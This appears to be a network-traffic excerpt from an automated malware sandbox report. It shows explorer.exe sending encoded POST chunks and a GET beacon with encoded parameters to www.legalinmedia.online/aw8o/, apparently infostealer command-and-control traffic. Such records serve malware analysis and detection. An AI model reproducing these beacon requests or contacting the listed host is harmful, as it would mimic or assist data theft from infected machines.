4e 70 69 47 49 56 62 32 53 6f 36 6f 65 37 55 39 2f 7a 51 59 6d 47 34 4b 72 75 44 37 63 74 2f 36 62 35 48 59 67 55 79 67 58 69 66 79 2b 63 45 61 6e 63 42 73 66 5a 36 48 6d 47 4e 6b 70 75 58 55 42 67 4a 33 38 74 74 39 41 5a 46 72 6b 58 4d 66 6e 4c 50 6d 35 32 4c 6a 77 4e 30 45 64 56 74 30 79 68 74 54 51 48 6c 48 47 48 44 42 59 56 56 57 4b 34 51 6d 47 38 42 35 57 75 30 6b 46 41 4e 61 5a 44 54 65 4c 4b 62 57 2b 49 4f 30 74 54 74 33 66 49 73 79 32 73 54 58 46 71 5a 55 33 6c 38 38 5a 54 62 77 6b 34 4e 63 32 77 6d 30 55 47 4b 4d 32 30 6d 59 53 58 58 48 58 78 43 37 57 71 30 31 74 42 64 4a 4c 6a 2b 53 71 35 30 4d 72 68 79 58 4f 32 77 4f 67 61 47 6c 78 35 41 51 66 48 6b 73 6b 68 63 4e 4f 49 4e 75 59 67 49 54 6f 2b 78 32 4f 5a 37 76 73 6e 7a 6e 65 64 34 64 7a 61 66 35 58 61 75 77 58 2b 59 57 43 38 49 4e 75 70 46 6a 36 62 32 71 4a 79 6b 48 44 74 6b 6b 32 65 48 4b 42 7a 64 58 66 67 38 70 58 6c 38 69 73 69 6d 37 63 76 53 73 56 6f 4a 64 52 4c 53 6a 44 69 43 66 50 62 6a 41 65 65 4c 58 45 73 6b 70 6e 4c 4f 72 64 74 30 6c 46 2f 73 4b 41 66 64 6c 45 4e 4c 56 35 6c 6d 45 56 6b 6b 2f 71 71 57 4c 48 4a 5a 78 50 6b 4d 72 46 54 6e 6b 68 76 6a 47 45 2b 43 67 75 63 49 59 67 53 34 79 6c 46 41 47 61 47 45 78 2b 46 30 47 6b 5a 52 67 53 5a 62 55 45 6e 30 5a 57 73 36 75 58 4d 46 66 58 39 79 2b 35 62 35 46 73 54 64 39 51 61 53 38 78 6f 4e 4d 71 4f 76 68 66 45 4b 72 35 6b 48 77 65 78 4c 34 78 77 47 4e 64 30 36 4f 45 4e 42 31 59 5a 37 67 4c 45 64 42 70 37 44 68 61 61 6e 34 72 79 33 6a 73 4f 72 48 39 35 4a 7a 78 4c 2b 2f 33 68 58 54 32 32 34 67 61 2b 53 56 4e 6c 6a 41 37 30 6d 65
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014933109 CEST841OUTData Raw: 32 66 4b 56 45 59 45 71 77 78 42 69 61 75 77 79 6e 53 4d 58 51 45 35 75 49 79 7a 72 39 6b 4e 44 47 48 79 62 58 4b 44 58 64 30 35 35 44 35 34 4e 6b 4a 4d 34 46 4d 2b 72 58 4d 71 37 6e 77 66 43 41 76 49 47 34 6a 52 49 4a 69 48 68 6a 50 66 56 65 70
                                                                                                                                                                                          Data Ascii: 2fKVEYEqwxBiauwynSMXQE5uIyzr9kNDGHybXKDXd055D54NkJM4FM+rXMq7nwfCAvIG4jRIJiHhjPfVepc2W47ejfCYo5fdlb83AwEnFFMEnUSDbi6HGGFsYz7PWk59IlouKSmS7bG2q96CTaglPGwZG+xU5GhZk6ekOmgn4V2pHIu1yBa7DbJ76AhQ2TdtY9jTOPUJIh+KB+S6gF2OmNTPOdJ0Uo74wi1RhzmzIgNlbAIeeme
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014974117 CEST842OUTData Raw: 58 72 4e 32 62 43 63 63 59 39 56 58 68 69 78 64 32 45 54 66 64 5a 79 34 76 61 53 35 53 47 34 2b 77 6a 74 77 43 72 45 30 39 77 36 32 36 39 49 34 57 77 67 57 2b 55 6f 44 54 31 6e 38 55 47 59 47 41 4a 71 4f 62 49 48 54 49 45 68 32 61 74 71 2b 4d 63
                                                                                                                                                                                          Data Ascii: XrN2bCccY9VXhixd2ETfdZy4vaS5SG4+wjtwCrE09w6269I4WwgW+UoDT1n8UGYGAJqObIHTIEh2atq+Mc/XvcKwfOafO0tSrO4BSwWCATAluFlGESjkF8F/89v0G4xHoxsDKIAsCafLm1u/LEcfANwwXRVRW5HZBtBg19hVF2sEvH9r7AYoAf5DORjNwViw2oFHKxcdozIar/JdNLch2hu9hGKrTzIiH0qXsGLUAZHkMk2c1/e
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062688112 CEST844OUTData Raw: 39 33 4e 4b 78 6c 72 4a 61 37 37 58 49 6e 70 38 4c 37 46 36 62 64 69 73 71 46 52 54 6a 75 69 38 31 74 61 2f 32 79 50 6c 49 2f 75 33 53 54 39 32 35 67 63 4e 74 52 6e 4a 4c 6d 53 53 64 6d 53 2b 74 70 37 68 59 66 75 45 52 39 58 6d 2b 34 6c 33 6b 35
                                                                                                                                                                                          Data Ascii: 93NKxlrJa77XInp8L7F6bdisqFRTjui81ta/2yPlI/u3ST925gcNtRnJLmSSdmS+tp7hYfuER9Xm+4l3k561hA08raYTP4hSL97G96BeWtXD8R2vNFRKtdjK4J7hphHExPFDxp51qgF0igWMAN9zZdaCIupTbkILeTdjegHDARYWzobBKK2KqH0qnDYhSUlSslaYl+mUu8y2YXMiBSyMM71u2y79cqYw7r8k1riXRbHrVhqcUEs
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062856913 CEST848OUTData Raw: 72 63 2b 41 72 59 56 6f 6a 65 69 7a 6d 2f 43 6a 4d 75 61 74 31 38 76 30 4c 6f 50 77 54 37 70 54 42 42 43 7a 47 5a 51 6c 56 39 72 52 66 54 6c 73 74 35 51 69 55 72 32 65 53 6a 36 62 79 77 66 77 36 35 42 78 6c 4b 74 44 73 45 54 6f 48 4b 38 54 55 52
                                                                                                                                                                                          Data Ascii: rc+ArYVojeizm/CjMuat18v0LoPwT7pTBBCzGZQlV9rRfTlst5QiUr2eSj6bywfw65BxlKtDsEToHK8TURTOk0cu86jCjgD0ZI96jjbCoecwJAdT3z84xph4mWhahYQen9EuFbLu/Ag2lQBQVQL3OS8WpUXWQnGEWN/VYJk7seVo/gRqr+BVSsw/SDdvTUUyWR6t86rpCqHCff9EJt3WPtPoHHb56VhaU1mkYHmyG0oA8AUA/LN
                                                                                                                                                                                          Aug 10, 2023 10:20:10.063026905 CEST849OUTData Raw: 4e 4a 41 51 42 77 34 38 57 53 50 55 33 53 4a 64 63 64 70 35 4b 57 6e 38 62 4c 54 66 43 32 51 34 56 33 47 6f 47 6f 39 6a 5a 6c 58 75 76 69 66 6f 58 62 57 68 63 47 2f 45 30 79 6c 33 6f 45 41 71 35 31 65 6d 71 55 52 62 6f 43 70 57 33 70 42 48 52 4d
                                                                                                                                                                                          Data Ascii: NJAQBw48WSPU3SJdcdp5KWn8bLTfC2Q4V3GoGo9jZlXuvifoXbWhcG/E0yl3oEAq51emqURboCpW3pBHRMF6qNM8ljFgo7ArIxADFuKIqLaTRXjwFArTgFooDlyJB5NFMekYZ55HvV5ZiOQ/dNaLgUn7tr7b3ATo0F/5AOgIcT/pagR+z8CCw3//qiyH2I/qSsNUz1AShfohQ4zoNcXe2KJ3uVtAqlVBTehhkPWaqi7D7j1myeA
                                                                                                                                                                                          Aug 10, 2023 10:20:10.063268900 CEST868OUTData Raw: 69 74 5a 50 59 34 66 39 79 5a 47 79 73 76 6a 4c 65 39 70 67 66 56 4f 2f 53 55 57 32 75 77 66 6a 69 39 33 54 6e 44 50 6e 41 79 30 69 45 4a 66 33 47 66 51 47 63 76 41 62 66 6a 72 54 77 51 45 5a 4c 63 4d 7a 31 65 50 6b 31 50 4a 50 42 2b 76 43 79 47
                                                                                                                                                                                          Data Ascii: itZPY4f9yZGysvjLe9pgfVO/SUW2uwfji93TnDPnAy0iEJf3GfQGcvAbfjrTwQEZLcMz1ePk1PJPB+vCyGXDNRHfhpX1ZJsdRyGyucjisfUSK1CAxDEPGdOauwaanFicza4gf/rJcZ6+ZME6tKyqow66kctvGUTJGkCVEPOMuOaNpicoKWYSa7irx9todzu7P6EwoIk5IMoMSpxyhEAyl+UH4O5Sv2ittjMbFkmTy6bNQfEPrPL
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110852957 CEST871OUTData Raw: 31 7a 33 46 39 74 52 50 73 41 62 7a 46 78 54 44 78 59 6c 4f 7a 5a 55 39 7a 45 62 6e 37 58 77 44 6c 74 4e 54 74 4f 64 35 34 6d 69 45 4c 35 39 42 68 7a 61 58 79 4e 6f 4f 52 63 51 6c 45 33 46 44 36 65 41 6c 32 6d 6f 48 4f 41 50 47 6d 63 54 4f 51 49
                                                                                                                                                                                          Data Ascii: 1z3F9tRPsAbzFxTDxYlOzZU9zEbn7XwDltNTtOd54miEL59BhzaXyNoORcQlE3FD6eAl2moHOAPGmcTOQIVhL083i/Si0zaYJ8sFLfDFGL+nmsZYCN3Hog2Ipgca6Zww+OwxFXP18Sj5U6Bl0+yVa6hBTbI2KjoQMJ7Rq65jUDU8GkyfCP5lfJGaZBilJj2IyAy1CoVGTkAtBGCrwIVkXNJGK68kkInTlBLKSB9IXTG2od82yE1
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110944986 CEST873OUTData Raw: 66 36 6a 79 68 41 6e 4a 65 4f 35 4b 65 6d 54 6e 61 6a 45 58 6d 54 39 55 62 65 51 4b 2f 4c 2b 6e 7a 39 44 4d 78 75 4a 4d 36 51 49 53 47 42 6d 4f 64 43 68 76 51 38 56 34 44 73 6e 65 75 74 6f 4b 43 62 65 67 6a 75 30 32 64 54 65 33 78 72 6e 4c 6b 5a
                                                                                                                                                                                          Data Ascii: f6jyhAnJeO5KemTnajEXmT9UbeQK/L+nz9DMxuJM6QISGBmOdChvQ8V4DsneutoKCbegju02dTe3xrnLkZfwrupQJdHtLfkxrT0M3H3V9F9bcLo9KMT6es0KMGs2/6yeOt11VS2f23fzqbTmgwnWJne7ZVOxfy5cq1+2J97LhSCMEABNI33HAZj6jtrKXfbtgFbsPCruLETm7JC122bj1Tp0Xt0ljcvkNMtKXPz+eC5+A3uxAgJ
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110995054 CEST880OUTData Raw: 6a 2f 6a 54 6b 4a 75 79 68 2b 4f 66 79 64 4a 44 38 48 46 76 59 62 56 63 51 73 41 51 43 76 44 70 64 65 44 78 30 32 65 49 2f 50 33 78 69 70 6a 44 64 70 31 43 36 42 30 50 79 78 59 4a 68 4c 4e 6c 77 65 68 56 2f 75 44 67 76 75 30 48 52 67 67 55 39 46
                                                                                                                                                                                          Data Ascii: j/jTkJuyh+OfydJD8HFvYbVcQsAQCvDpdeDx02eI/P3xipjDdp1C6B0PyxYJhLNlwehV/uDgvu0HRggU9F0JbJEqCuZQlRvlv0hBkDinyakMhr9bdm9q1JLK69ZGUSSvzg8Qa+uWe4PDn9nQJXtkqupL7efM2c8QlX/aZI225HR891O4GDZfyKKsVEkwVYHpdRiTEdlZSWcXX59/Q9g0G0LXoL23vyePEQ871PrQfXbcm+Iz8sJ
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111205101 CEST882OUTData Raw: 41 71 6c 42 4c 4b 65 52 70 39 73 6a 37 53 63 52 37 6c 4b 6f 34 2f 66 79 6e 49 61 39 46 64 58 76 75 57 75 57 4a 61 63 33 50 45 59 7a 6c 42 42 2f 45 2b 65 69 52 4a 5a 38 34 39 32 2b 31 38 36 58 38 4c 6a 4c 48 32 64 32 53 42 53 45 2b 64 53 6f 6a 43
                                                                                                                                                                                          Data Ascii: AqlBLKeRp9sj7ScR7lKo4/fynIa9FdXvuWuWJac3PEYzlBB/E+eiRJZ8492+186X8LjLH2d2SBSE+dSojCTfycjSSbIwfqDs0JEvKR/oDqfK5L89RG5/wwQSg7ADob0jB8WozH148CZ+ZbWn261neaArSeJXZf33uJ7HkTDUhedV2gMrtiaNOAAPGJZ6iV4MvId0zTECTp/mI2aj+AMYOr4t5iOsNWuHLHj0sbNS1LzVuHzrmdv
                                                                                                                                                                                          Aug 10, 2023 10:20:10.160793066 CEST885INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:10 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 66 66 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e d0 9d d0 b5 20 d0 be d0 bf d1 83 d0 b1 d0 bb d0 b8 d0 ba d0 be d0 b2 d0 b0 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74
                                                                                                                                                                                          Data Ascii: ff2c<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> </title><link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&display=swap" rel="stylesheet"><script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script><script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } output.push(value); } ret
                                                                                                                                                                                          Aug 10, 2023 10:20:10.160913944 CEST887INData Raw: 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d
                                                                                                                                                                                          Data Ascii: urn output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if ( (value & 0xF800) === 0xD800 ) {
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161020994 CEST888INData Raw: 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 6b 20 3d 20 30 3b 20 64 65 6c 74 61 20 3e 20 28 28 28 62 61 73 65 20 2d 20 74 6d 69 6e 29 20 2a 20 74 6d 61 78 29 20 3e 3e 20
                                                                                                                                                                                          Data Ascii: floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k + (base - tmin + 1) * delta / (delta + skew))
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161082983 CEST889INData Raw: 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 67 69 74 20 3d 20 64 65 63 6f 64 65 5f 64 69 67 69 74 28 69
                                                                                                                                                                                          Data Ascii: e_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_input(2)"); }
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161138058 CEST891INData Raw: 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 70 75 74 5b 69 5d 20 3d 20 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f
                                                                                                                                                                                          Data Ascii: if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output); }; this.encode = function (i
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161192894 CEST892INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6d 20 2d
                                                                                                                                                                                          Data Ascii: if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); } delta += (m - n) * (h + 1);
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161248922 CEST893INData Raw: 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 3d 30 3b 20 69 20 3c 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                          Data Ascii: n.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn--" + punycode.encode(s) :
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161341906 CEST895INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 32 39 35 45 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 77 72 61 70
                                                                                                                                                                                          Data Ascii: 10px; } a { color: #14295E; } .wrapper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex; flex: 1 0 auto;flex-direction: column;justify-content: spac
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161439896 CEST896INData Raw: 3a 20 23 38 39 39 34 41 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: : #8994AF; font-size: 10px; } .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap:
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161541939 CEST897INData Raw: 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 34 70 78
                                                                                                                                                                                          Data Ascii: .footer-links { padding: 14px 0; margin: 14px 0; border-top: 1px solid #F3F4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header>
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209132910 CEST899INData Raw: 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 62 65 76 65 6c 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 31 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63
                                                                                                                                                                                          Data Ascii: troke-linejoin="bevel"/> <path opacity="0.1" fill-rule="evenodd" clip-rule="evenodd" d="M248.358 132.645L251.526 132.541L261.769 137.465L309.277 133.838L321.829 125.218L308.12 118.684L260.612 122.311L251.2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          26192.168.11.204974191.189.114.2780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:12.590080023 CEST956OUTGET /aw8o/?P4=_n5TPHiTKZj&1NM6e=csQIKxSiAps2oY2HkWP4m2UAXHoJbYdtF0OMXDtSslnXYUx4jfx20xSs5MiYBfJn4Wt0LZQ+kGwlvq1TpxG6ruHpMlvoexuWNA== HTTP/1.1
                                                                                                                                                                                          Host: www.legalinmedia.online
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637526989 CEST957INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:12 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Transfer-Encoding: chunked
